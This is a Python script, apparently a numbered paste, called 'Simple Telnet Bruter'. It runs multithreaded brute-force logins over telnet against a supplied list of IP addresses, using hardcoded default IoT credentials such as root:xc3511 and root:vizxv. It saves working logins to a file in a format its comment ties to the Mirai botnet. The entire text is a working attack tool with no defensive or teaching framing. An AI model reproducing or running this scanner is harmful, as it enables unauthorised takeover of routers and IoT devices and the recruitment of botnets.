#!/usr/bin/python# Simple Telnet Bruter | By; LiGhT# Lots of false possitive

1. #!/usr/bin/python
2. # Simple Telnet Bruter | By; LiGhT
3. # Lots of false possitives but pulls alot of results extremely fast
4.  
5. import threading
6. import sys, os, re, time, socket
7. from Queue import *
8. from sys import stdout
9.  
10. if len(sys.argv) < 4:
11. print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
12. sys.exit()
13.  
14. combo = [
15. "root:xc3511",
16. "root:vizxv",
17. "root:admin",
18. "admin:admin",
19. "root:root",
20. "admin:root",
21. "root:Zte521",
22. "support:support",
23. "telnet:telnet",
24. "user:user",
25. "root:Admin",
26. "user:user",
27.  
28. ]
29.  
30. ips = open(sys.argv[1], "r").readlines()
31. threads = int(sys.argv[2])
32. output_file = sys.argv[3]
33. queue = Queue()
34. queue_count = 0
35.  
36. for ip in ips:
37. queue_count += 1
38. stdout.write("\r[%d] Added to queue" % queue_count)
39. stdout.flush()
40. queue.put(ip)
41. print "\n"
42.  
43.  
44. class router(threading.Thread):
45. def __init__ (self, ip):
46. threading.Thread.__init__(self)
47. self.ip = str(ip).rstrip('\n')
48. def run(self):
49. username = ""
50. password = ""
51. for passwd in combo:
52. if ":n/a" in passwd:
53. password=""
54. else:
55. password=passwd.split(":")[1]
56. if "n/a:" in passwd:
57. username=""
58. else:
59. username=passwd.split(":")[0]
60. try:
61. tn = socket.socket()
62. tn.settimeout(8)
63. tn.connect((self.ip,23))
64. except Exception:
65. tn.close()
66. break
67. try:
68. hoho = ''
69. hoho += readUntil(tn, "ogin:")
70. if "ogin" in hoho:
71. tn.send(username + "\n")
72. time.sleep(0.09)
73. except Exception:
74. tn.close()
75. try:
76. hoho = ''
77. hoho += readUntil(tn, "assword:")
78. if "assword" in hoho:
79. tn.send(password + "\n")
80. time.sleep(0.8)
81. else:
82. pass
83. except Exception:
84. tn.close()
85. try:
86. prompt = ''
87. prompt += tn.recv(40960)
88. if ">" in prompt and "ONT" not in prompt:
89. success = True
90. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
91. success = True
92. else:
93. tn.close()
94. if success == True:
95. try:
96. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
97. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
98. tn.close()
99. break
100. except:
101. tn.close()
102. else:
103. tn.close()
104. except Exception:
105. tn.close()
106.  
107. def readUntil(tn, string, timeout=8):
108. buf = ''
109. start_time = time.time()
110. while time.time() - start_time < timeout:
111. buf += tn.recv(1024)
112. time.sleep(0.01)
113. if string in buf: return buf
114. raise Exception('TIMEOUT!')
115.  
116. def worker():
117. try:
118. while True:
119. try:
120. IP = queue.get()
121. thread = router(IP)
122. thread.start()
123. queue.task_done()
124. time.sleep(0.02)
125. except:
126. pass
127. except:
128. pass
129.  
130. for l in xrange(threads):
131. try:
132. t = threading.Thread(target=worker)
133. t.start()
134. except:
135. pass